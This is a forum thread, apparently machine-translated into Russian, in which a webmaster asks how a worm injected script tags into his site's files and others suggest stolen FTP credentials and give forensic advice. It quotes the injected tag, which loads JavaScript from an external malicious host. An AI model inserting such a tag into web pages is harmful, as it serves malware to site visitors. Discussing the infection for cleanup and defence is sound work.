Мой сайт помечен Google / StopBadware.org как опасный, и я нашел это в нескольких файлах js / html:
<script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Gigahertz.js"></script>
<!--a0e2c33acd6c12bdc9e3f3ba50c98197-->
Почистил несколько файлов, восстанавливаю резервную копию, но как понять, как червь был установлен? Что я могу искать в файлах журнала? Этот сервер, Centos 5, используется только как сервер apache, с установленными нашими программами, тикивики и друпалом.
Спасибо
Седрик
У нас также есть эта проблема на наших серверах (запущена 11 июня), когда червь вводит точно такое же содержимое, как вы написали выше.
Похоже, нет никакой связи ни с чем связанным с apache / php; черви просто подключаются через FTP и добавляют эти теги сценария в * .php и * .html. Недействительных паролей нет; они получают это с первой попытки.
Из-за этого, я думаю, это может быть связано с клиентом. Я думаю, что у клиентов есть вирус, который либо отслеживает любые действия FTP, либо, возможно, проверяет любые сохраненные пароли в FileZilla. Однако я не уверен и буду исследовать это дальше. Если вам повезет, сообщите нам об этом в этой ветке.
Изменить: к вашему сведению, наш клиент не использовал Drupal. Это была только Joomla и несколько статических HTML-файлов.
Анализ инцидентов вторжений никогда не бывает легким, особенно если вы не следовали стандартной процедуре восстановления (отключите физический сервер, получите образ сектора всех файловых систем, к которым у него есть доступ, полностью перестроите машину с установочного носителя, восстановите данные) .
Как правило, вы сначала просматриваете все файлы журналов, начиная с журналов Apache. Наиболее вероятным вектором атаки в вашем случае является drupal, но он ни в коем случае не единственно возможный, поэтому следует проверять все журналы (я имею в виду ВСЕ журналы). В зависимости от используемой файловой системы могут быть предприняты дополнительные шаги, чтобы определить, какие действия имели место во время заражения, и выяснить как использованный вектор атаки, так и то, что было сделано.
Тем временем проверьте все программное обеспечение, которое работает на вашем компьютере, и убедитесь, что оно обновлено. Это включает все ваши модули, темы и т.д.
Изменить: я забыл упомянуть тот факт, что в вашем случае и поскольку у вас, по-видимому, нет соответствующего опыта в доме, вы можете рассмотреть вопрос о передаче инцидента в охранную компанию, которая проводит судебно-медицинский анализ: это может быть немного на дорогая сторона, но вы получите четкие ответы о том, что произошло и как этого избежать.